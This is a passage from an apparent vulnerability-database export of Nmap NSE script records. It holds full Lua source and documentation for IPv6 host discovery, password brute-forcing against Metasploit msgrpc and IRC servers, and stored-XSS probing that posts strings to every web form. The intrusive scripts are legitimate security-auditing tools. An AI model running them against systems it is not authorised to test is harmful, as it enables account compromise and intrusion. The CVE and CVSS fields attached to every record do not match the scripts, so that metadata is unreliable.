fail(\"Missing subject or message\")\n else\n local mm = mobileme.Helper:new(arg_username, arg_password)\n local status, devices = mm:getDevices()\n\n if ( not(status) ) then\n return fail(\"Failed to get devices\")\n end\n\n if ( status and arg_deviceindex <= #devices ) then\n local status = mm:sendMessage( devices[arg_deviceindex].id, arg_subject, arg_message, arg_sound)\n if ( status ) then\n return (\"\\n Message was successfully sent to \\\"%s\\\"\"):format(decodeString(devices[arg_deviceindex].name or \"\"))\n else\n return \"\\n Failed to send message\"\n end\n end\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T09:33:51", "description": "Attempts to discover available IPv6 hosts on the LAN by sending an MLD (multicast listener discovery) query to the link-local multicast address (ff02::1) and listening for any responses. The query's maximum response delay set to 1 to provoke hosts to respond immediately rather than waiting for other responses from their multicast group.\n\n## Script Arguments \n\n#### targets-ipv6-multicast-mld.interface \n\nInterface to send on (default: the interface specified with -e or every available Ethernet interface with an IPv6 address.)\n\n#### targets-ipv6-multicast-mld.timeout \n\ntimeout to wait for responses (default: 10s)\n\n#### max-newtargets, newtargets \n\nSee the documentation for the [target](<../lib/target.html#script-args>) library. \n\n## Example Usage \n \n \n nmap -6 --script=targets-ipv6-multicast-mld.nse --script-args 'newtargets,interface=eth0'\n \n\n## Script Output \n \n \n Pre-scan script results:\n | targets-ipv6-multicast-mld:\n | IP: fe80::5a55:abcd:ef01:2345 MAC: 58:55:ab:cd:ef:01 IFACE: en0\n | IP: fe80::9284:0123:4567:89ab MAC: 90:84:01:23:45:67 IFACE: en0\n |\n |_ Use --script-args=newtargets to add the results as targets\n \n\n## Requires \n\n * [ipOps](<../lib/ipOps.html>)\n * [coroutine](<>)\n * [nmap](<../lib/nmap.html>)\n * [stdnse](<../lib/stdnse.html>)\n * [tab](<../lib/tab.html>)\n * [table](<>)\n * [tableaux](<../lib/tableaux.html>)\n * [target](<../lib/target.html>)\n * [multicast](<../lib/multicast.html>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2012-04-09T06:43:28", "type": "nmap", "title": "targets-ipv6-multicast-mld NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2018-11-06T15:07:01", "id": "NMAP:TARGETS-IPV6-MULTICAST-MLD.NSE", "href": "https://nmap.org/nsedoc/scripts/targets-ipv6-multicast-mld.html", "sourceData": "local ipOps = require \"ipOps\"\nlocal coroutine = require \"coroutine\"\nlocal nmap = require \"nmap\"\nlocal stdnse = require \"stdnse\"\nlocal tab = require \"tab\"\nlocal table = require \"table\"\nlocal tableaux = require \"tableaux\"\nlocal target = require \"target\"\nlocal multicast = require \"multicast\"\n\ndescription = [[\nAttempts to discover available IPv6 hosts on the LAN by sending an MLD\n(multicast listener discovery) query to the link-local multicast address\n(ff02::1) and listening for any responses. The query's maximum response delay\nset to 1 to provoke hosts to respond immediately rather than waiting for other\nresponses from their multicast group.\n]]\n\n---\n-- @usage\n-- nmap -6 --script=targets-ipv6-multicast-mld.nse --script-args 'newtargets,interface=eth0'\n--\n-- @output\n-- Pre-scan script results:\n-- | targets-ipv6-multicast-mld:\n-- | IP: fe80::5a55:abcd:ef01:2345 MAC: 58:55:ab:cd:ef:01 IFACE: en0\n-- | IP: fe80::9284:0123:4567:89ab MAC: 90:84:01:23:45:67 IFACE: en0\n-- |\n-- |_ Use --script-args=newtargets to add the results as targets\n--\n-- @args targets-ipv6-multicast-mld.timeout timeout to wait for\n-- responses (default: 10s)\n-- @args targets-ipv6-multicast-mld.interface Interface to send on (default:\n-- the interface specified with -e or every available Ethernet interface\n-- with an IPv6 address.)\n--\n-- @xmloutput\n-- <table>\n-- <table>\n-- <elem key=\"address\">fe80::5a55:abcd:ef01:2345</elem>\n-- <elem key=\"mac\">58:55:ab:cd:ef:01</elem>\n-- <elem key=\"iface\">en0</elem>\n-- </table>\n-- <table>\n-- <elem key=\"address\">fe80::9284:0123:4567:89ab</elem>\n-- <elem key=\"mac\">90:84:01:23:45:67</elem>\n-- <elem key=\"iface\">en0</elem>\n-- </table>\n-- </table>\n\nauthor = {\"niteesh\", \"alegen\"}\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"discovery\",\"broadcast\"}\n\n\nlocal arg_timeout = stdnse.parse_timespec(stdnse.get_script_args(SCRIPT_NAME .. '.timeout'))\n\nprerule = function()\n if ( not(nmap.is_privileged()) ) then\n stdnse.verbose1(\"not running for lack of privileges.\")\n return false\n end\n return true\nend\n\n\nlocal function get_interfaces()\n local interface_name = stdnse.get_script_args(SCRIPT_NAME .. \".interface\")\n or nmap.get_interface()\n\n -- interfaces list (decide which interfaces to broadcast on)\n local interfaces = {}\n for _, if_table in pairs(nmap.list_interfaces()) do\n if (interface_name == nil or if_table.device == interface_name) -- check for correct interface\n and ipOps.ip_in_range(if_table.address, \"fe80::/10\") -- link local address\n and if_table.link == \"ethernet\" then -- not the loopback interface\n table.insert(interfaces, if_table)\n end\n end\n\n return interfaces\nend\n\nlocal function single_interface_broadcast(if_nfo, results)\n stdnse.debug2(\"Starting \" .. SCRIPT_NAME .. \" on \" .. if_nfo.device)\n local condvar = nmap.condvar(results)\n\n local reports = multicast.mld_query(if_nfo, arg_timeout or 10)\n for _, r in pairs(reports) do\n local l2reply = r[2]\n local l3reply = r[3]\n local target_str = l3reply.ip_src\n if not results[target_str] then\n if target.ALLOW_NEW_TARGETS then\n target.add(target_str)\n end\n results[target_str] = { address = target_str, mac = stdnse.format_mac(l2reply.mac_src), iface = if_nfo.device }\n end\n end\n\n condvar(\"signal\")\nend\n\nlocal function format_output(results)\n local output = tab.new()\n local xmlout = {}\n local ips = tableaux.keys(results)\n table.sort(ips)\n\n for i, ip in ipairs(ips) do\n local record = results[ip]\n xmlout[i] = record\n tab.addrow(output, \" IP: \" .. record.address, \"MAC: \" .. record.mac, \"IFACE: \" .. record.iface)\n end\n\n if ( #output > 0 ) then\n output = {\"\", tab.dump(output) }\n if not target.ALLOW_NEW_TARGETS then\n table.insert(output, \" Use --script-args=newtargets to add the results as targets\")\n end\n return xmlout, table.concat(output, \"\\n\")\n end\nend\n\naction = function()\n local threads = {}\n local results = {}\n local condvar = nmap.condvar(results)\n\n for _, if_nfo in ipairs(get_interfaces()) do\n -- create a thread for each interface\n local co = stdnse.new_thread(single_interface_broadcast, if_nfo, results)\n threads[co] = true\n end\n\n repeat\n for thread in pairs(threads) do\n if coroutine.status(thread) == \"dead\" then threads[thread] = nil end\n end\n if ( next(threads) ) then\n condvar \"wait\"\n end\n until next(threads) == nil\n\n return format_output(results)\nend\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T21:41:00", "description": "Performs brute force username and password auditing against Metasploit msgrpc interface.\n\n## Script Arguments \n\n#### creds.[service], creds.global \n\nSee the documentation for the [creds](<../lib/creds.html#script-args>) library. \n\n#### smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername \n\nSee the documentation for the [smbauth](<../lib/smbauth.html#script-args>) library. \n\n#### passdb, unpwdb.passlimit, unpwdb.timelimit, unpwdb.userlimit, userdb \n\nSee the documentation for the [unpwdb](<../lib/unpwdb.html#script-args>) library. \n\n#### brute.credfile, brute.delay, brute.emptypass, brute.firstonly, brute.guesses, brute.mode, brute.passonly, brute.retries, brute.start, brute.threads, brute.unique, brute.useraspass \n\nSee the documentation for the [brute](<../lib/brute.html#script-args>) library. \n\n#### slaxml.debug \n\nSee the documentation for the [slaxml](<../lib/slaxml.html#script-args>) library. \n\n#### http.host, http.max-body-size, http.max-cache-size, http.max-pipeline, http.pipeline, http.truncated-ok, http.useragent \n\nSee the documentation for the [http](<../lib/http.html#script-args>) library. \n\n## Example Usage \n \n \n nmap --script metasploit-msgrpc-brute -p 55553 <host>\n \n This script uses brute library to perform password\n guessing against Metasploit's msgrpc interface.\n \n \n\n## Script Output \n \n \n PORT STATE SERVICE REASON\n 55553/tcp open unknown syn-ack\n | metasploit-msgrpc-brute:\n | Accounts\n | root:root - Valid credentials\n | Statistics\n |_ Performed 10 guesses in 10 seconds, average tps: 1\n\n## Requires \n\n * [brute](<../lib/brute.html>)\n * [shortport](<../lib/shortport.html>)\n * [stdnse](<../lib/stdnse.html>)\n * [string](<>)\n * [http](<../lib/http.html>)\n * [creds](<../lib/creds.html>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2012-06-30T12:02:54", "type": "nmap", "title": "metasploit-msgrpc-brute NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2018-09-06T14:20:31", "id": "NMAP:METASPLOIT-MSGRPC-BRUTE.NSE", "href": "https://nmap.org/nsedoc/scripts/metasploit-msgrpc-brute.html", "sourceData": "local brute = require \"brute\"\nlocal shortport = require \"shortport\"\nlocal stdnse = require \"stdnse\"\nlocal string = require \"string\"\nlocal http = require \"http\"\nlocal creds = require \"creds\"\n\ndescription = [[\nPerforms brute force username and password auditing against\nMetasploit msgrpc interface.\n\n]]\n\n---\n-- @usage\n-- nmap --script metasploit-msgrpc-brute -p 55553 <host>\n--\n-- This script uses brute library to perform password\n-- guessing against Metasploit's msgrpc interface.\n--\n--\n-- @output\n-- PORT STATE SERVICE REASON\n-- 55553/tcp open unknown syn-ack\n-- | metasploit-msgrpc-brute:\n-- | Accounts\n-- | root:root - Valid credentials\n-- | Statistics\n-- |_ Performed 10 guesses in 10 seconds, average tps: 1\n\n\n\nauthor = \"Aleksandar Nikolic\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"intrusive\", \"brute\"}\n\nportrule = shortport.port_or_service(55553,\"metasploit-msgrpc\")\n\n\n-- returns a \"prefix\" that msgpack uses for strings\nlocal get_prefix = function(data)\n if #data <= 31 then\n return string.pack(\"B\", 0xa0 + #data)\n else\n return \"\\xda\" .. string.pack(\">I2\", #data)\n end\nend\n\n-- simple function that implements basic msgpack encoding we need for this script\n-- see http://wiki.msgpack.org/display/MSGPACK/Format+specification for more\nlocal encode = function(username, password)\n return \"\\x93\\xaaauth.login\" .. get_prefix(username) .. username .. get_prefix(password) .. password\nend\n\nDriver = {\n\n new = function(self, host, port)\n local o = {}\n setmetatable(o, self)\n self.__index = self\n o.host = host\n o.port = port\n return o\n end,\n\n -- as we are using http methods, no need for connect and disconnect\n -- this might cause a problem as in other scripts that don't have explicit connect\n -- as there is no way to \"reserve\" a socket\n connect = function( self )\n return true\n end,\n\n login = function (self, user, pass)\n local data\n local options = {\n header = {\n [\"Content-Type\"] = \"binary/message-pack\"\n }\n }\n stdnse.debug1( \"Trying %s/%s ...\", user, pass )\n data = http.post(self.host,self.port, \"/api/\",options, nil , encode(user,pass))\n if data and data.status and tostring( data.status ):match( \"200\" ) then\n if string.find(data.body,\"success\") then\n return true, creds.Account:new( user, pass, creds.State.VALID)\n else\n return false, brute.Error:new( \"Incorrect username or password\" )\n end\n end\n local err = brute.Error:new(\"Login didn't return a proper response\")\n err:setRetry( true )\n return false, err\n end,\n\n disconnect = function( self )\n return true\n end\n}\n\naction = function( host, port )\n\n local status, result\n local engine = brute.Engine:new(Driver, host, port)\n engine.options.script_name = SCRIPT_NAME\n engine.options.firstonly = true\n engine.max_threads = 3\n engine.max_retries = 10\n status, result = engine:start()\n\n return result\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T21:42:49", "description": "Unfiltered '>' (greater than sign). An indication of potential XSS vulnerability.\n\n### See also:\n\n * [ http-dombased-xss.nse ](<../scripts/http-dombased-xss.html>)\n * [ http-phpself-xss.nse ](<../scripts/http-phpself-xss.html>)\n * [ http-xssed.nse ](<../scripts/http-xssed.html>)\n * [ http-unsafe-output-escaping.nse ](<../scripts/http-unsafe-output-escaping.html>)\n\n## Script Arguments \n\n#### http-stored-xss.formpaths \n\nThe pages that contain the forms to exploit. For example, {/upload.php, /login.php}. Default: nil (crawler mode on)\n\n#### http-stored-xss.uploadspaths \n\nThe pages that reflect back POSTed data. For example, {/comments.php, /guestbook.php}. Default: nil (Crawler mode on)\n\n#### http-stored-xss.fieldvalues \n\nThe script will try to fill every field found in the form but that may fail due to fields' restrictions. You can manually fill those fields using this table. For example, {gender = \"male\", email = \"foo@bar.com\"}. Default: {}\n\n#### http-stored-xss.dbfile \n\nThe path of a plain text file that contains one XSS vector per line. Default: nil\n\n#### slaxml.debug \n\nSee the documentation for the [slaxml](<../lib/slaxml.html#script-args>) library. \n\n#### httpspider.doscraping, httpspider.maxdepth, httpspider.maxpagecount, httpspider.noblacklist, httpspider.url, httpspider.useheadfornonwebfiles, httpspider.withindomain, httpspider.withinhost \n\nSee the documentation for the [httpspider](<../lib/httpspider.html#script-args>) library. \n\n#### smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername \n\nSee the documentation for the [smbauth](<../lib/smbauth.html#script-args>) library. \n\n#### http.host, http.max-body-size, http.max-cache-size, http.max-pipeline, http.pipeline, http.truncated-ok, http.useragent \n\nSee the documentation for the [http](<../lib/http.html#script-args>) library. \n\n## Example Usage \n \n \n nmap -p80 --script http-stored-xss.nse <target>\n \n This script works in two phases.\n 1) Posts specially crafted strings to every form it encounters.\n 2) Crawls through the page searching for these strings.\n \n If any string is reflected on some page without any proper\n HTML escaping, it's a sign for potential XSS vulnerability.\n \n\n## Script Output \n \n \n PORT STATE SERVICE REASON\n 80/tcp open http syn-ack\n | http-stored-xss:\n | Found the following stored XSS vulnerabilities:\n |\n | Payload: ghz>hzx\n | Uploaded on: /guestbook.php\n | Description: Unfiltered '>' (greater than sign). An indication of potential XSS vulnerability.\n | Payload: zxc'xcv\n | Uploaded on: /guestbook.php\n | Description: Unfiltered ' (apostrophe). An indication of potential XSS vulnerability.\n |\n | Payload: ghz>hzx\n | Uploaded on: /posts.php\n | Description: Unfiltered '>' (greater than sign). An indication of potential XSS vulnerability.\n | Payload: hzx\"zxc\n | Uploaded on: /posts.php\n |_ Description: Unfiltered \" (double quotation mark). An indication of potential XSS vulnerability.\n \n\n## Requires \n\n * [http](<../lib/http.html>)\n * [io](<>)\n * [string](<>)\n * [httpspider](<../lib/httpspider.html>)\n * [shortport](<../lib/shortport.html>)\n * [stdnse](<../lib/stdnse.html>)\n * [table](<>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2013-07-06T14:39:47", "type": "nmap", "title": "http-stored-xss NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2017-06-14T21:37:25", "id": "NMAP:HTTP-STORED-XSS.NSE", "href": "https://nmap.org/nsedoc/scripts/http-stored-xss.html", "sourceData": "description = [[\nPosts specially crafted strings to every form it\nencounters and then searches through the website for those\nstrings to determine whether the payloads were successful.\n]]\n\n---\n-- @usage nmap -p80 --script http-stored-xss.nse <target>\n--\n-- This script works in two phases.\n-- 1) Posts specially crafted strings to every form it encounters.\n-- 2) Crawls through the page searching for these strings.\n--\n-- If any string is reflected on some page without any proper\n-- HTML escaping, it's a sign for potential XSS vulnerability.\n--\n-- @args http-stored-xss.formpaths The pages that contain\n-- the forms to exploit. For example, {/upload.php, /login.php}.\n-- Default: nil (crawler mode on)\n-- @args http-stored-xss.uploadspaths The pages that reflect\n-- back POSTed data. For example, {/comments.php, /guestbook.php}.\n-- Default: nil (Crawler mode on)\n-- @args http-stored-xss.fieldvalues The script will try to\n-- fill every field found in the form but that may fail due to\n-- fields' restrictions. You can manually fill those fields using\n-- this table. For example, {gender = \"male\", email = \"foo@bar.com\"}.\n-- Default: {}\n-- @args http-stored-xss.dbfile The path of a plain text file\n-- that contains one XSS vector per line. Default: nil\n--\n-- @output\n-- PORT STATE SERVICE REASON\n-- 80/tcp open http syn-ack\n-- | http-stored-xss:\n-- | Found the following stored XSS vulnerabilities:\n-- |\n-- | Payload: ghz>hzx\n-- | Uploaded on: /guestbook.php\n-- | Description: Unfiltered '>' (greater than sign). An indication of potential XSS vulnerability.\n-- | Payload: zxc'xcv\n-- | Uploaded on: /guestbook.php\n-- | Description: Unfiltered ' (apostrophe). An indication of potential XSS vulnerability.\n-- |\n-- | Payload: ghz>hzx\n-- | Uploaded on: /posts.php\n-- | Description: Unfiltered '>' (greater than sign). An indication of potential XSS vulnerability.\n-- | Payload: hzx\"zxc\n-- | Uploaded on: /posts.php\n-- |_ Description: Unfiltered \" (double quotation mark). An indication of potential XSS vulnerability.\n--\n-- @see http-dombased-xss.nse\n-- @see http-phpself-xss.nse\n-- @see http-xssed.nse\n-- @see http-unsafe-output-escaping.nse\n\ncategories = {\"intrusive\", \"exploit\", \"vuln\"}\nauthor = \"George Chatzisofroniou\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\n\nlocal http = require \"http\"\nlocal io = require \"io\"\nlocal string = require \"string\"\nlocal httpspider = require \"httpspider\"\nlocal shortport = require \"shortport\"\nlocal stdnse = require \"stdnse\"\nlocal table = require \"table\"\n\nportrule = shortport.port_or_service( {80, 443}, {\"http\", \"https\"}, \"tcp\", \"open\")\n\n\n-- A list of payloads.\n--\n-- You can manually add / remove your own payloads but make sure you\n-- don't mess up, otherwise the script may succeed when it actually\n-- hasn't.\n--\n-- Note, that more payloads will slow down your scan.\npayloads = {\n\n -- Basic vectors. Each one is an indication of potential XSS vulnerability.\n { vector = 'ghz>hzx', description = \"Unfiltered '>' (greater than sign). An indication of potential XSS vulnerability.\" },\n { vector = 'hzx\"zxc', description = \"Unfiltered \\\" (double quotation mark). An indication of potential XSS vulnerability.\" },\n { vector = 'zxc\\'xcv', description = \"Unfiltered ' (apostrophe). An indication of potential XSS vulnerability.\" },\n}\n\n\n-- Create customized requests for all of our payloads.\nlocal makeRequests = function(host, port, submission, fields, fieldvalues)\n\n local postdata = {}\n for _, p in ipairs(payloads) do\n for __, field in ipairs(fields) do\n if field[\"type\"] == \"text\" or field[\"type\"] == \"textarea\" or field[\"type\"] == \"radio\" or field[\"type\"] == \"checkbox\" then\n\n local value = fieldvalues[field[\"name\"]]\n if value == nil then\n value = p.vector\n end\n\n postdata[field[\"name\"]] = value\n\n end\n end\n\n stdnse.debug2(\"Making a POST request to \" .. submission .. \": \")\n for i, content in pairs(postdata) do\n stdnse.debug2(i .. \": \" .. content)\n end\n local response = http.post(host, port, submission, { no_cache = true }, nil, postdata)\n end\n\nend\n\nlocal checkPayload = function(body, p)\n\n if (body:match(p)) then\n return true\n end\n\nend\n\n-- Check if the payloads were successful by checking the content of pages in the uploadspaths array.\nlocal checkRequests = function(body, target)\n\n local output = {}\n for _, p in ipairs(payloads) do\n if checkPayload(body, p.vector) then\n local report = \" Payload: \" .. p.vector .. \"\\n\\t Uploaded on: \" .. target\n if p.description then\n report = report .. \"\\n\\t Description: \" .. p.description\n end\n table.insert(output, report)\n end\n end\n return output\nend\n\nlocal readFromFile = function(filename)\n local database = { }\n for l in io.lines(filename) do\n table.insert(payloads, { vector = l })\n end\nend\n\naction = function(host, port)\n\n local formpaths = stdnse.get_script_args(\"http-stored-xss.formpaths\")\n local uploadspaths = stdnse.get_script_args(\"http-stored-xss.uploadspaths\")\n local fieldvalues = stdnse.get_script_args(\"http-stored-xss.fieldvalues\") or {}\n local dbfile = stdnse.get_script_args(\"http-stored-xss.dbfile\")\n\n if dbfile then\n readFromFile(dbfile)\n end\n\n local returntable = {}\n local result\n\n local crawler = httpspider.Crawler:new( host, port, '/', { scriptname = SCRIPT_NAME, no_cache = true } )\n\n if (not(crawler)) then\n return\n end\n\n crawler:set_timeout(10000)\n\n local index, k, target, response\n\n -- Phase 1. Crawls through the website and POSTs malicious payloads.\n while (true) do\n\n if formpaths then\n\n k, target = next(formpaths, index)\n if (k == nil) then\n break\n end\n response = http.get(host, port, target, { no_cache = true })\n target = host.name .. target\n else\n\n local status, r = crawler:crawl()\n -- if the crawler fails it can be due to a number of different reasons\n -- most of them are \"legitimate\" and should not be reason to abort\n if ( not(status) ) then\n if ( r.err ) then\n return stdnse.format_output(false, r.reason)\n else\n break\n end\n end\n\n target = tostring(r.url)\n response = r.response\n\n end\n\n if response.body then\n\n local forms = http.grab_forms(response.body)\n\n for i, form in ipairs(forms) do\n\n form = http.parse_form(form)\n\n if form and form.action then\n\n local action_absolute = string.find(form[\"action\"], \"https*://\")\n\n -- Determine the path where the form needs to be submitted.\n local submission\n if action_absolute then\n submission = form[\"action\"]\n else\n local path_cropped = string.match(target, \"(.*/).*\")\n path_cropped = path_cropped and path_cropped or \"\"\n submission = path_cropped..form[\"action\"]\n end\n\n makeRequests(host, port, submission, form[\"fields\"], fieldvalues)\n\n end\n end\n end\n if (index) then\n index = index + 1\n else\n index = 1\n end\n\n end\n\n local crawler = httpspider.Crawler:new( host, port, '/', { scriptname = SCRIPT_NAME } )\n local index\n\n -- Phase 2. Crawls through the website and searches for the special crafted strings that were POSTed before.\n while true do\n if uploadspaths then\n k, target = next(uploadspaths, index)\n if (k == nil) then\n break\n end\n response = http.get(host, port, target)\n else\n\n local status, r = crawler:crawl()\n -- if the crawler fails it can be due to a number of different reasons\n -- most of them are \"legitimate\" and should not be reason to abort\n if ( not(status) ) then\n if ( r.err ) then\n return stdnse.format_output(false, r.reason)\n else\n break\n end\n end\n\n target = tostring(r.url)\n response = r.response\n\n end\n\n if response.body then\n\n result = checkRequests(response.body, target)\n\n if next(result) then\n table.insert(returntable, result)\n end\n end\n if (index) then\n index = index + 1\n else\n index = 1\n end\n end\n\n if next(returntable) then\n table.insert(returntable, 1, \"Found the following stored XSS vulnerabilities: \")\n return returntable\n else\n return \"Couldn't find any stored XSS vulnerabilities.\"\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T21:41:30", "description": "Performs brute force password auditing against IRC (Internet Relay Chat) servers.\n\n## Script Arguments \n\n#### passdb, unpwdb.passlimit, unpwdb.timelimit, unpwdb.userlimit, userdb \n\nSee the documentation for the [unpwdb](<../lib/unpwdb.html#script-args>) library. \n\n#### creds.[service], creds.global \n\nSee the documentation for the [creds](<../lib/creds.html#script-args>) library. \n\n#### brute.credfile, brute.delay, brute.emptypass, brute.firstonly, brute.guesses, brute.mode, brute.passonly, brute.retries, brute.start, brute.threads, brute.unique, brute.useraspass \n\nSee the documentation for the [brute](<../lib/brute.html#script-args>) library. \n\n## Example Usage \n \n \n nmap --script irc-brute -p 6667 <ip>\n \n\n## Script Output \n \n \n PORT STATE SERVICE\n 6667/tcp open irc\n | irc-brute:\n | Accounts\n | password - Valid credentials\n | Statistics\n |_ Performed 1927 guesses in 36 seconds, average tps: 74\n \n\n## Requires \n\n * [brute](<../lib/brute.html>)\n * [comm](<../lib/comm.html>)\n * [creds](<../lib/creds.html>)\n * [match](<../lib/match.html>)\n * [irc](<../lib/irc.html>)\n * [stdnse](<../lib/stdnse.html>)\n * [rand](<../lib/rand.html>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2011-10-26T21:55:35", "type": "nmap", "title": "irc-brute NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2018-09-08T17:07:06", "id": "NMAP:IRC-BRUTE.NSE", "href": "https://nmap.org/nsedoc/scripts/irc-brute.html", "sourceData": "local brute = require \"brute\"\nlocal comm = require \"comm\"\nlocal creds = require \"creds\"\nlocal match = require \"match\"\nlocal irc = require \"irc\"\nlocal stdnse = require \"stdnse\"\nlocal rand = require \"rand\"\n\ndescription=[[\nPerforms brute force password auditing against IRC (Internet Relay Chat) servers.\n]]\n\n---\n-- @usage\n-- nmap --script irc-brute -p 6667 <ip>\n--\n-- @output\n-- PORT STATE SERVICE\n-- 6667/tcp open irc\n-- | irc-brute:\n-- | Accounts\n-- | password - Valid credentials\n-- | Statistics\n-- |_ Performed 1927 guesses in 36 seconds, average tps: 74\n--\n\n--\n-- Version 0.1\n-- Created 26/10/2011 - v0.1 - created by Patrik Karlsson <patrik@cqure.net>\n--\n\n\nauthor = \"Patrik Karlsson\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories={\"brute\",\"intrusive\"}\n\nportrule = irc.portrule\n\nDriver = {\n\n new = function(self, host, port, opts)\n local o = { host = host, port = port, opts = opts or {} }\n setmetatable(o, self)\n self.__index = self\n return o\n end,\n\n connect = function(self)\n -- the high timeout should take delays from ident into consideration\n local s, r, opts, _ = comm.tryssl(self.host,\n self.port,\n '',\n { timeout = self.opts.timeout or 10000 } )\n if ( not(s) ) then\n return false, \"Failed to connect to server\"\n end\n self.socket = s\n return true\n end,\n\n login = function(self, _, password)\n local msg = (\"PASS %s\\r\\nNICK nmap_brute\\r\\nUSER anonymous 0 * :Nmap brute\\r\\n\"):format(password)\n local status, data = self.socket:send(msg)\n local success = false\n\n if ( not(status) ) then\n local err = brute.Error:new( data )\n -- This might be temporary, set the retry flag\n err:setRetry( true )\n return false, err\n end\n\n repeat\n local status, response = self.socket:receive_buf(match.pattern_limit(\"\\r?\\n\", 2048), false)\n -- we check for the RPL_WELCOME message, if we don't see it,\n -- we failed to authenticate\n if ( status and response:match(\"^:.-%s(%d*)%s\") == \"001\" ) then\n success = true\n end\n until(not(status))\n\n if (success) then\n return true, creds.Account:new(\"\", password, creds.State.VALID)\n end\n return false, brute.Error:new(\"Incorrect password\")\n end,\n\n disconnect = function(self) return self.socket:close() end,\n}\n\nlocal function needsPassword(host, port)\n local msg = (\"NICK %s\\r\\nUSER anonymous 0 * :Nmap brute\\r\\n\"):format(rand.random_alpha(9))\n local s, r, opts, _ = comm.tryssl(host, port, msg, { timeout = 15000 } )\n local err, code\n\n repeat\n local status, response = s:receive_buf(match.pattern_limit(\"\\r?\\n\", 2048), false)\n if ( status ) then\n code = tonumber(response:match(\"^:.-%s(%d*)%s\"))\n -- break after first code\n if (code == 001 